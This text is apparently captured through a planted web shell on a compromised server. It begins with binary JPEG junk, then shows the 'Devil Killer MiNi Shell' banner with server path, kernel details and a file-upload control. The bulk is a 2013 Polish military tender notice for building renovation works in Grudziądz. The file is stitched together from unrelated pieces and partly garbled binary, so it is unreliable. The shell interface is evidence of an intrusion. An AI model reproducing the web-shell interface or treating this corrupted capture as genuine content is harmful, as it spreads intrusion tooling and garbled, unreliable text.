JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131025/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131025/435806-N-2013.html

<p class="kh_header"><b>Grudziądz: REMONT KLATEK SCHODOWYCH I POMIESZCZEŃ PRZY
UL. LEGIONÓW W GRUDZIĄDZU, REMONT CZĘŚCI OGRODZENIA KOMPLEKSU PRZY UL. BEMA W GRUDZIĄDZU, MONTAŻ DRZWI P.POŻ
W BUDYNKU NR 18 PRZY UL. CZWARTAKÓW W GRUDZIĄDZU - SPRAWA NR 95/2013</b><br>
<b>Numer ogłoszenia: 435806 - 2013; data zamieszczenia: 25.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> 13 Wojskowy Oddział Gospodarczy (Jednostka Wojskowa 4503 ) , ul. Czwartaków 1, 86-300 Grudziądz, woj. kujawsko-pomorskie, tel. 56 458 32 90, 458 32 00, faks 56 458 32 22.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.13wog.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Budżetowa Finansów Publicznych - Wojsko.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> REMONT KLATEK SCHODOWYCH I POMIESZCZEŃ PRZY
UL. LEGIONÓW W GRUDZIĄDZU, REMONT CZĘŚCI OGRODZENIA KOMPLEKSU PRZY UL. BEMA W GRUDZIĄDZU, MONTAŻ DRZWI P.POŻ
W BUDYNKU NR 18 PRZY UL. CZWARTAKÓW W GRUDZIĄDZU - SPRAWA NR 95/2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest remont klatek schodowych i pomieszczeń przy ul. Legionów
w Grudziądzu ,remont  części ogrodzenia kompleksu przy ul. Bema w Grudziądzu, montaż drzwi p.poż w budynku nr 18 przy ul. Czwartaków w Grudziądzu  zgodnie z wymaganiami określonymi w Rozdziale III SIWZ oraz szczegółowym opisem przedmiotu zamówienia zawartym
w Załączniku Nr  1,2,3  do SIWZ. 
Przedmiot zamówienia obejmuje wykonanie robót następująco:
1)Zadanie nr 1: remont klatek schodowych i pomieszczeń biurowych w budynku nr 21 i 28
w kompleksie przy ul. Legionów w Grudziądzu.
2)Zadanie nr 2:  remont  części ogrodzenia kompleksu przy ul. Bema w Grudziądzu.
3)Zadanie nr 3: montaż drzwi p.poż w budynku nr 18 przy ul. Czwartaków  w Grudziądzu.
2.Przedmiot zamówienia obejmuje w szczególności: 
1)Zadanie nr 1: remont klatek schodowych i pomieszczeń biurowych w budynku nr 21 i 28
w kompleksie przy ul. Legionów w Grudziądzu.
ROBOTY:
konserwacja malarska pomieszczeń biurowych;
ułożenie płytek na klatce schodowej;
wymiana wykładzin oraz ułożenie paneli podłogowych w pomieszczeniach biurowych;
wymiana opraw oświetleniowych;
wykonanie podziału pomieszczenia kancelarii tajnej przegrodą PCV.	
WYSZCZEGÓLNIENIE I OPIS PRAC TOWARZYSZĄCYCH
Wykonawca zabezpiecza we własnym zakresie i na swój koszt:
wydzielenie etapów robót;
oświetlenie terenu prowadzonych  robót;
poręcze, mostki, daszki i zabezpieczenia na terenie robót;
znaki informacyjne i ostrzegawcze na terenie prowadzonych robót;
wykonanie i utrzymanie zaplecza socjalnego i magazynowego budowy;
oznaczenie i zabezpieczenie instalacji i urządzeń na terenie robót;
wykonanie rusztowań niezbędnych do wykonania robót.
Opis przedmiotu zamówienia według Wspólnego Słownika Zamówień (CPV) oraz zgodnie 
z Rozporządzeniem Prezesa Rady Ministrów z dnia 03.12.2012 r. w sprawie wykazu robót budowlanych (Dz.U. 2012 r. poz. 1372):
KOD CPV: 45442100-8- roboty malarskie
KOD CPV: 45431200-9- kładzenie glazury
KOD CPV: 45310000-3- roboty instalacyjne elektryczne
KOD CPV: 90500000-2- utylizacja odpadów
2)Zadanie nr 2: remont części ogrodzenia kompleksu wojskowego przy ul. Bema w Grudziądzu.
ROBOTY BUDOWLANE:
remont części ogrodzenia kompleksu wojskowego przy ul. Bema  - odcinek odrodzenia od ul. Legionów.
WYSZCZEGÓLNIENIE I OPIS PRAC TOWARZYSZĄCYCH
Wykonawca zabezpiecza we własnym zakresie i na swój koszt:
znaki ostrzegawcze na terenie robót;
wykonanie i utrzymanie zaplecza budowy;
oznaczenie i zabezpieczenie instalacji i urządzeń na terenie robót.
Opis przedmiotu zamówienia według Wspólnego Słownika Zamówień (CPV) oraz zgodnie 
z Rozporządzeniem Prezesa Rady Ministrów z dnia 03.12.2012 r. w sprawie wykazu robót budowlanych (Dz.U. z 2012 r. poz. 1372):
KOD CPV: 45111300-1- roboty rozbiórkowe
KOD CPV: 45442100-8- roboty malarskie
KOD CPV: 45340000-2- instalowanie ogrodzeń, płotów i sprzętu ochronnego
3)Zadanie nr 3: montaż drzwi przeciwpożarowych w budynku nr 18
w kompleksie przy ul Czwartaków w Grudziądzu.
ROBOTY WEWNĘTRZNE:
wykonanie ścianek z cegły pełnej i dziurawki;
ułożenie nadproży prefabrykowanych typu L19;
osadzenie drzwi przeciwpożarowych przekazanych od inwestora;
wykonanie tynków cementowo - wapiennych na wykonanych ściankach;
wykonanie gładzi gipsowych oraz roboty malarskie w obrębie wykonanych ścianek.
WYSZCZEGÓLNIENIE I OPIS PRAC TOWARZYSZĄCYCH
Wykonawca zabezpiecza we własnym zakresie i na swój koszt:
ogrodzenie etapów  robót;
oświetlenie terenu robót;
poręcze, mostki, daszki, i zabezpieczenia na terenie robót;
znaki ostrzegawcze na terenie robót;
oznaczenie i zabezpieczenie instalacji i urządzeń na terenie robót;
wykonanie rusztowań niezbędnych do wykonania robót.
Opis przedmiotu zamówienia według Wspólnego Słownika Zamówień (CPV) oraz zgodnie 
z Rozporządzeniem Prezesa Rady Ministrów z dnia 03.12.2012 r. w sprawie wykazu robót budowlanych (Dz.U. z 2012 r. poz. 1372):
KOD CPV: 45421131-1-  instalowanie drzwi
KOD CPV: 45262522-6- roboty murarskie
KOD CPV: 45410000-4- roboty tynkarskie
KOD CPC: 45442100-8- roboty malarskie
3.Szczegółowy opis przedmiotu zamówienia określają w szczególności: przedmiary robót 
i specyfikacje techniczna wykonania i odbioru robót,  (Załączniki Nr 1,2,3 do SIWZ) .
4.Budynek, teren, w zakresie których będą wykonywane roboty na czas wykonywania robót będą czynne. Wszystkie prace budowlane należy zorganizować i przeprowadzić tak, aby zagwarantować ciągłość pracy, bez zakłóceń oraz zapewnić bezpieczeństwo i właściwe warunki korzystania z obiektów i terenu dla jego użytkowników.
5.Wykonawca zapewnia wszelkie materiały i urządzenia niezbędne do wykonania przedmiotu zamówienia we własnym zakresie i na swój koszt oraz zobowiązany jest do stosowania wyrobów budowlanych zgodnych ze specyfikacjami technicznymi wykonania i odbioru robót oraz dopuszczonymi do stosowania przez ustawę Prawo budowlane, posiadającymi aktualne atesty 
i certyfikaty pozwalające na ich stosowanie.
6.Użyte do wykonania przedmiotu zamówienia materiały, nie mogą obniżać wartości użytkowej 
i jakościowej wykonanych elementów zamówienia ani ujemnie wpływać na wytrzymałość, funkcjonalność i bezpieczeństwo przedmiotu zamówienia.
7.W przypadku wskazania w opisie przedmiotu zamówienia znaku towarowego, patentu, pochodzenia - należy przyjąć, że wskazane znaki towarowe, patenty, pochodzenie określają parametry techniczne, eksploatacyjne, użytkowe, co oznacza, że Zamawiający dopuszcza rozwiązania równoważne opisywanym (podstawa prawna art. 30 ust 4 ustawy). Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez Zamawiającego, jest obowiązany wykazać, że oferowane przez niego materiały lub wyroby do wykonania  przedmiotu zamówienia spełniają wymagania określone przez Zamawiającego (podstawa prawna
art. 30 ust. 5 ustawy) poprzez złożenie opisu technicznego i podania nazwy produktu
i producenta. 
8.W przypadku gdy Wykonawca nie przedłoży wraz z ofertą informacji o zastosowaniu materiałów równoważnych uznaje się, iż kalkulacja ceny obejmuje materiały wskazane w dokumentacji stanowiącej Załącznik Nr 1,2,3  do SIWZ.
9.Wykonawca zobowiązany jest do wykonania robót zgodnie ze sztuką budowlaną, obowiązującymi przepisami i normami oraz przy zachowaniu przepisów BHP.
10.Przedmiot zamówienia winien być wykonany zgodnie ze specyfikacją techniczną wykonania 
i odbioru robót, opracowanymi jak w Załączniku Nr 1,2,3 do SIWZ oraz wytycznymi (poleceniami) Zamawiającego i/lub Inspektora Nadzoru.
11.Wykonawca zobowiązany jest do:
1)zapewnienia bezpieczeństwa pracy pracowników wykonujących roboty (w szczególności do przeszkolenia pracowników i wyposażenie ich w niezbędny sprzęt);
2)zagwarantowania bezpieczeństwa i ochrony zdrowia osobom korzystającym z budynku, terenu 
i  przebywającym w budynku i /lub na terenie robót oraz wokół budynku ze względu na fakt,
 iż roboty odbywać się będą na obiekcie i terenie czynnym;
3)umożliwienia podczas realizacji robót korzystania w sposób bezpieczny i niezakłócony 
z budynku, terenu przez pracowników, żołnierzy i interesantów danej jednostki wojskowej;
4)realizacji robót na terenie wykonywania robót w sposób nieuciążliwy dla użytkowników budynku i/lub terenu.
12.Transport wszelkich materiałów oraz urządzeń na miejsce realizacji robót i ich eksploatacja obciążają Wykonawcę.
13.Wykonawca zobowiązany jest do zapewnienia we własnym zakresie wywozu i utylizacji odpadów (śmieci, gruz itp.) zgodnie z przepisami obowiązującymi w tej mierze w szczególności z ustawą 
o odpadach oraz udokumentowania tych czynności.
14.Zamawiający zaleca, aby Wykonawca dokonał wizji lokalnej na terenie realizacji przedmiotu zamówienia w celu przygotowania oferty:
1)wizja lokalna będzie mogła mieć miejsce w dni robocze od poniedziałku do piątku w godzinach 9.00-13.00, nie później niż do 3 dnia przed terminem wyznaczonym na składanie ofert;
2)o dokonanie wizji lokalnej należy zwracać się pisemnie lub faksem pod nr: 56/ 458 32 22
- sprawa numer 95/2013. Zamawiający udzieli telefonicznie lub faksem lub pisemnie odpowiedzi wskazując termin wizji lokalnej.
Osoby, które będą okazywać teren / budynek są upoważnione do udostępnienia budynku 
i terenu w zakresie jego okazania. Prowadzenie jakichkolwiek ustaleń z osobami nie jest wiążące. Wszelkie merytoryczne zapytania należy kierować pisemnie bezpośrednio na adres Zamawiającego.
3)dokonania wizji lokalnej w miejscu wykonywania zamówienia może dokonać przedstawiciel Wykonawcy ubiegający się o udzielenie zamówienia, który udostępni przed rozpoczęciem wizji lokalnej imienne upoważnienie do reprezentowania Wykonawcy, oraz dowód tożsamości; 
4)z przeprowadzonej wizji lokalnej zostanie sporządzony protokół (Załącznik Nr 15  do SIWZ).</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.44.21.00-8, 45.43.12.00-9, 45.31.00.00-3, 90.50.00.00-2, 45.42.11.31-1, 45.26.25.22-6, 45.41.00.00-4, 45.11.13.00-1, 45.34.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 13.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Zamawiający żąda od Wykonawców składających ofertę wniesienia wadium przed upływem terminu składania ofert w wysokości ogółem:
1.770,00 zł.
2.Wykonawca, który składa ofertę na więcej niż jedno zadanie zobowiązany jest wnieść wadium  
w wysokości sumy wadiów tych zadań.
3.Wysokość wadium na poszczególne zadania:
Zadanie Nr 1:1100,00 zł
Zadanie Nr 2:510,00 zł
Zadanie Nr 3:160,00 zł
4.Wykonawca zobowiązany jest wnieść wadium na cały okres związania ofertą.
5.W przypadku nie wniesienia wadium, w tym również na przedłużony okres związania ofertą, lub nie wyrażenia zgody na przedłużenie okresu
związania z ofertą Wykonawca zostanie wykluczony z postępowania o udzielenie zamówienia.
6.Wadium może być wnoszone w jednej lub kilku następujących formach:
1)pieniądzu;
2)poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, 
z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3)gwarancjach bankowych;
4)gwarancjach ubezpieczeniowych;
5)poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z  dnia 
9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości  (Dz. U. z 2007 r. 
Nr 42, poz. 275 ze zm.).
7.W przypadku wniesienia wadium w formie gwarancji, z jej treści powinno wynikać bezwarunkowe, nieodwołalne i na pierwsze pisemne żądanie
zgłoszone przez Zamawiającego (w terminie związania ofertą) zobowiązanie Gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 4a i ust. 5 Ustawy. 
Treść gwarancji nie może zawierać warunku wypłaty wadium, iż żądanie wypłaty Zamawiającego musi być doręczone pod rygorem nieważności za
pośrednictwem banku prowadzącego rachunek Beneficjenta gwarancji, który potwierdzi, że podpisy złożone na żądaniu wypłaty należą do osób
uprawnionych do zaciągania zobowiązań majątkowych w imieniu Beneficjenta gwarancji.
8.Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego:
NBP ODDZIAŁ OKRĘGOWY W BYDGOSZCZY       
25 1010 1078 0105 5913 9120 0000
W przypadku, gdy Wykonawca załącza do składanej oferty dowód wpłaty wadium wówczas składa go w formie oryginału lub kopii poświadczonej
za zgodność z oryginałem przez Wykonawcę lub inną/e osobę/y upoważnioną/e do reprezentowania Wykonawcy. O wniesieniu wadium decyduje
data i godzina wpływu środków na rachunek bankowy Zamawiającego.
9.Wadium wnoszone w poręczeniach bankowych, poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, gwarancjach bankowych,
gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o których mowa w ust. 6 pkt 5 Rozdziału IX SIWZ, należy:
zdeponować w formie oryginału w kasie Zamawiającego - budynek nr 20 pokój nr 1 przed upływem terminu do składania ofert (Zamawiający
dopuszcza przesłanie oryginału dokumentu za pośrednictwem poczty, dokument należy przesłać na adres Zamawiającego  z dopiskiem  KASA
numer sprawy). Natomiast kopię dokumentu poświadczoną za zgodność z oryginałem przez Wykonawcę lub inną/e osobę/y upoważnioną do
reprezentowania Wykonawcy należy załączyć do składanej oferty.
Kasa czynna jest: od poniedziałku do piątku w godzinach 7.00 -13.00 (przerwa: 9.00 - 10.15).
LUB
dołączyć oryginał dokumentu do oferty wraz z kopią potwierdzoną za zgodność 
z oryginałem.
10.Przy wnoszeniu wadium Wykonawca winien podać: nazwę przedmiotu zamówienia, numer sprawy, numer zadania oraz numer rachunku
(dotyczy formy pieniężnej), na który należy zwrócić wadium.
11.Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z
wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a Ustawy.
12.Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie
zamówienia publicznego.
13.Zamawiający zwraca niezwłocznie wadium, na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
14.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 Ustawy, nie
złożył dokumentów lub oświadczeń,o których mowa w art. 25 ust. 1 Ustawy, lub pełnomocnictw, chyba że udowodni, że wynika to             z przyczyn nieleżących po jego stronie (art. 46 ust. 4a Ustawy).
15.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
1)odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych 
w ofercie;
2)nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
3)zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
Uwaga! Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na podstawie ust.11, jeżeli w wyniku
ostatecznego rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez
Zamawiającego (art. 46 ust. 3 Ustawy)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony na podstawie:
złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu, o których mowa 
w art. 22 ust. 1 pkt. 1 PZP; oraz oświadczenia w zakresie zezwoleń wynikających z ustawy o odpadach i spełnieniu przez Wykonawcę wymogów ustawy z dnia
14.12.2012 r. o odpadach (Dz. U. 2013, poz. 21 z późn.zm.) obejmujące przedmiotowo odpady w postaci gruzu i substancji ropopochodnych;
Ocena spełnienia powyższych warunków nastąpi na podstawie treści przedstawionych dokumentów i oświadczeń , na zasadzie spełnia lub nie spełnia wymaganych warunków.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony na podstawie:
złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu, o których mowa 
w art. 22 ust. 1 pkt. 2 PZP, oraz Wykonawca winien wykazać, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert,
a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej:
w zadaniu nr 1: dwie najważniejsze wykonane roboty w zakresie ogólnobudowlanym - każda  z wykazanych robót winna stanowić
co najmniej kwotę 50.000,00 zł (wzór: Załącznik Nr 9 do SIWZ)
w zadaniu nr 2: dwie najważniejsze wykonane roboty w zakresie ogólnobudowlanym - każda z wykazanych robót winna stanowić
co najmniej kwotę 50.000,00 zł (wzór: Załącznik Nr 9 do SIWZ)
w zadaniu nr 3: dwie najważniejsze wykonane roboty w zakresie ogólnobudowlanym - każda z wykazanych robót winna stanowić
co najmniej kwotę 50.000,00 zł (wzór: Załącznik Nr 9 do SIWZ)
Wykonawca składa wraz z ofertą wykaz robót wraz z dowodami, że roboty zostały wykonane 
w sposób należyty oraz zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone 
z zastrzeżeniem § 9 ust. 2 Rozporządzenia Prezesa Rady Ministrów z 19.02.2013 r. w sprawie rodzajów dokumentów, jakich może
żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz.U. poz. 231).
Ocena spełnienia powyższych warunków nastąpi na podstawie treści przedstawionych dokumentów i oświadczeń
wyszczególnionych w Rozdziale VII, na zasadzie spełnia lub nie spełnia wymaganych warunków.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony na podstawie:
złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu, o których mowa
w art. 22 ust. 1 pkt.3 PZP, oraz ocena spełnienia powyższego warunku nastąpi na podstawie
oświadczenia  na zasadzie spełnia lub nie spełnia wymaganych warunków .</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony na podstawie:
złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu, o których mowa
w art. 22 ust. 1 pkt.3 PZP, oraz Wykonawca zagwarantuje, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają
wymagane uprawnienia (jeżeli ustawy nakładają obowiązek posiadania takich uprawnień)  oraz, że dysponuje co najmniej:
w zadaniu nr 1: 
1 osobą tj. kierownikiem robót budowlanych, uprawnionym do kierowania robotami w zakresie konstrukcyjno-budowlanym w
ograniczonym zakresie, należącym do Izby Inżynierów Budownictwa
w zadaniu nr 2: 
1 osobą tj. kierownikiem robót budowlanych, uprawnionym do kierowania robotami w zakresie konstrukcyjno-budowlanym w
ograniczonym zakresie, należącym do Izby Inżynierów Budownictwa
w zadaniu nr 3: 
1 osobą tj. kierownikiem robót budowlanych, uprawnionym do kierowania robotami w zakresie konstrukcyjno-budowlanym w
ograniczonym zakresie, należącym do Izby Inżynierów Budownictwa
Ocena spełnienia powyższych warunków nastąpi na podstawie treści przedstawionych dokumentów i oświadczeń
wyszczególnionych w Rozdziale VII, na zasadzie spełnia lub nie spełnia wymaganych warunków.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony na podstawie:
złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu, o których mowa
w art. 22 ust. 1 pkt.4 PZP, oraz Wykonawca wykaże, iż jest ubezpieczony od odpowiedzialności cywilnej w
zakresie prowadzonej działalności zgodnie z przedmiotem zamówienia ogółem na kwotę co najmniej 70%
wartości brutto ogółem składanej oferty (jeżeli Wykonawca składa ofertę na dwa lub większą liczbę zadań -liczonej od sumy wartości wszystkich zadań). Ocena spełnienia powyższych warunków nastąpi na
podstawie treści przedstawionych dokumentów i oświadczeń, na
zasadzie spełnia lub nie spełnia wymaganych warunków .</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

